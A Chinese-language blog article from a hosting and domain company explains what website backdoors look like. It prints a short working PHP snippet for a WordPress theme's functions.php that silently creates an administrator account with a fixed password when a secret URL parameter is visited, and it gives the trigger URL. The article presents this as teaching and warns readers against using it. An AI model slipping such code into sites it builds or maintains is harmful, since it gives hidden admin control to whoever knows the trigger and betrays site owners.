行业动态

防御吧作为15年知名老牌域名服务商,CNNIC和CANN双认证域名注册商,已经
持续为500多万个域名提供服务,包括智能DNS/自由转移/隐私保护等服务!
网站是怎么被黑客挂了后门代码的?教你看懂后门代码长啥样
2021-08-14 13:20:24 【

是不是在很多场合听说过后门(Backdoor),特别是一些高科技的电影里面,那些系统或者程序的作者都会通过自己留下的后门来拯救世界。其实程序的后门留我们根本不远,其实你用的很多软件或者程序都是有后门的,下面给大家演示的一个很简单的案例,就可以给 WordPress 站点留下后门,获取管理员权限,当然这只是一篇教学文章,个人强烈你在使用 WordPress 帮人作网站的时候,千万不要这样做。

<?phpadd_action( 'wp_head', 'my_backdoor' );functionmy_backdoor(){if ( md5( $_GET['backdoor'] ) == '34d1f91fb2e514b8576fab1a75a89a6b' ) {    require( 'wp-includes/registration.php' );    if ( !username_exists( 'backdoor' ) ) {        $user_id = wp_create_user( 'backdoor', 'pa55w0rd!' );        $user = new WP_User( $user_id );        $user->set_role( 'administrator' );     }}}

在主题的 functions.php 文件中添加以上代码,就可以给 WordPress 添加一个能够创建管理员的后门,只需访问
http://www.yoursitename.com/?backdoor=go,然后就创建了一个用户名为“backdoor”,密码为:“pa55w0rd!” 的管理员。


】【打印关闭】 【返回顶部
分享到QQ空间
分享到: 
上一篇九种勒索软件"助推器" .. 下一篇错误配置Argo Workflows将会使Kub..

立足首都,辐射全球,防御吧专注云防御及云计算服务15年!

联系我们

服务热线:13051179500 18910191973
企业QQ:1245940436
技术支持:010-56159998
E-Mail:xihedata.com
Copyright ? 2003-2016 fangyuba. 防御吧(完美解决防御与加速) 版权所有 增值许可:京B2-20140042号
售前咨询
公司总机:18910191973
24小时电话:010-56159998
投诉电话:18910191973
值班售后/技术支持
售后服务/财务
备案专员
紧急电话:18610088800